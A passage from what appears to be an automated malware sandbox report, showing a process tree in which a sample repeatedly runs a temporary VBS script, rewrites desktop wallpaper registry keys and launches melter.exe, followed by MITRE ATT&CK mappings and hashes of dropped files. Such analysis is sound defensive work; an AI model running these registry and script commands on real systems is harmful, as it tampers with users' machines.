        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5752
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5936
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5908
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5952
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:5920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6004
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5736
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5880
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5776
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5884
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5748
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5928
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5932
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6140
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1980
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:5676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:384
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5936
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5952
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6004
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:6192
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6232
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6256
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6268
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:6288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6296
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6332
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6352
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:4640
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:1816
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:4876
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:2632
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:1112
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:4840
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:2536
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:408
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:1340
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
    3⤵
    PID:2348
- - C:\Users\Admin\AppData\Local\Temp\melter.exe
    melter.exe
    3⤵
    PID:4220

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f8 0x32c
1⤵
PID:868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5536

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
14e39f4cdd30773637f3ea2117101f1b

SHA1
10aab19cbd34741788f868ec949313af9ef30c25

SHA256
d3b8a390dac251855b01a877ab377db1d1bcee21bce9887cb5cb06ab560b865a

SHA512
df33aef36e0b6ddc7e1c5e55a5d9b588ba8083077d75488b6a957411a47866ddc00566451f24c5bebad2a348b96fdaac2db556a7a2dbfc4c153006d5eee2d5ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
5433eab10c6b5c6d55b7cbd302426a39

SHA1
c5b1604b3350dab290d081eecd5389a895c58de5

SHA256
23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131

SHA512
207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
063fa26d779f114734bd9130125608c3

SHA1
3a1b8fb1a319f6c40a71b117d6b07106d2a53857

SHA256
e8f8cb3e295999c4b311836d5fe1213b4721d56ab14af3eacd1bcdd051b5a66b

SHA512
fbe868cad1196fa3630581f269e8c512af1ed7b1d1e5708c369ed28810d37e48301370f19260657f47a560165113d28437741db39b91aaff69776143598b4391

Download Submit
C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

Filesize
27B

MD5
597cf1068c84a5c01afd9472a7453116

SHA1
bc9a638c47aab57b04b2257f421a48b2ee682732

SHA256
0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799

SHA512
3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600

Download Submit
C:\Users\Admin\AppData\Local\Temp\20112.vbs

Filesize
1KB

MD5
135594160762ab9dd80794d7b34ab32a

SHA1
638fef88bbb5d310c51eda07ca10918a482ad3ac

SHA256
531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0

SHA512
19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2140.vbs

Filesize
490B

MD5
93e179454db6fe9ac81112193de37cde

SHA1
4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9

SHA256
8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc

SHA512
a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

Download Submit
C:\Users\Admin\AppData\Local\Temp\23881.vbs

Filesize
179B

MD5
523092d53a06f5b46778a0cd7c01d0fb

SHA1
221a8244271afdbe7ce105aaf189f1dbcfa57cdb

SHA256
09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e

SHA512
72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\24298.vbs

Filesize
236B

MD5
3a7e0a94fa88dccd40d9b76b37d06db1

SHA1
d7604ddb660898ce3b1343aa712cf5926bc68bda

SHA256
368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4

SHA512
19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\27880.bat

Filesize
460B

MD5
8ad6322485c7d856c17e873e19eed5e3

SHA1
17e63b21645965b2fc0399e029ceb60dcadaeb65

SHA256
bac0bf0688d46ad2c892b14470d53c5d391ea1d9a1ae6e47390761837a3859d8

SHA512
22d40de03f468d8b6fc9f41fd8133dccba09b67bbbb57a891b1d02609e980c54a830b223130cb932f36ebcbf691913d58492d0ef5caf1e5993b17daf10bbc807

Download Submit
C:\Users\Admin\AppData\Local\Temp\29423.vbs

Filesize
106B

MD5
ec385d968eea8bf5abe4587305f39c89

SHA1
6509b0bb7cb6432a4c723f37dc7593116ad57c64

SHA256
98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96

SHA512
d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\5084.vbs

Filesize
276B

MD5
8a9b451fd9936100f33b576bb5ec3f02

SHA1
80c92544f733ddfb96dffa296293fb2835e85f2e

SHA256
4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455

SHA512
b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6396.vbs

Filesize
390B

MD5
aabbe725da9751315bbeeda4ef58d816

SHA1
476c78912d61e790a793c8e6606825f2b169947c

SHA256
0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360

SHA512
0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\9287.vbs

Filesize
160B

MD5
f04baf362847f135ddcc2101c0cc9186

SHA1
58df6c1d5484d0216ba1fbbca34b1480bbcea667

SHA256
3d1fae2062f06f13c7dee29b11f049379c41cf149c7b2b13b4c167c00c738abf

SHA512
acf4e87846c39a633810d76bc9c23ab7fc49724371d5131769cf1f85aacb951c62699a6dc8e8dd75c91989a45b0ee08215916772d77554aa6860762a9c0d5a1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AE80.tmp\AE81.tmp\AE91.bat

Filesize
8KB

MD5
074b0499fa7df4238b66cf7f0ab1ca64

SHA1
3ad09a2f3f51e5b4899397ec185672a6c0c4af18

SHA256
48fdcc988fd0f193c920c28ba7a8414497a4190278c8c077fda92a5349290b48

SHA512
496c6e1c462d40f5515ccf50b4ad7f14258782bc9329bad0c7776f4b22b66dd8790e181149604f87e816b865945dd4893c644b545aa84a4ed53ecfcabdca9686

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ie1b5mxc.02x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\melter.exe

Filesize
3KB

MD5
d9baac374cc96e41c9f86c669e53f61c

SHA1
b0ba67bfac3d23e718b3bfdfe120e5446d0229e8

SHA256
a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412

SHA512
4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

Download Submit
C:\Users\Admin\AppData\Local\Temp\risitas.hta

Filesize
511B

MD5
af25ddf889ed3804a85b487a95993a94

SHA1
e22ce7ce7e6b18400913de410be90fa79c2b6edb

SHA256
bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab

SHA512
8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1676-127-0x000001EFE0BE0000-0x000001EFE0C56000-memory.dmp

Filesize
472KB

Download
memory/1676-166-0x000001EFE0900000-0x000001EFE0912000-memory.dmp

Filesize
72KB

Download
memory/1676-128-0x000001EFC81A0000-0x000001EFC81F0000-memory.dmp

Filesize
320KB

Download
memory/1676-129-0x000001EFC8050000-0x000001EFC806E000-memory.dmp

Filesize
120KB

Download
memory/1676-4-0x00007FFCA90B0000-0x00007FFCA9B71000-memory.dmp

Filesize
10.8MB

Download
memory/1676-186-0x00007FFCA90B0000-0x00007FFCA9B71000-memory.dmp

Filesize
10.8MB

Download
memory/1676-165-0x000001EFE08D0000-0x000001EFE08DA000-memory.dmp

Filesize
40KB

Download
memory/1676-2-0x000001EFC63E0000-0x000001EFC6420000-memory.dmp

Filesize
256KB

Download
memory/1676-3-0x00007FFCA90B3000-0x00007FFCA90B5000-memory.dmp

Filesize
8KB

Download
memory/4328-106-0x00000184D8E30000-0x00000184D8E52000-memory.dmp

Filesize
136KB

Download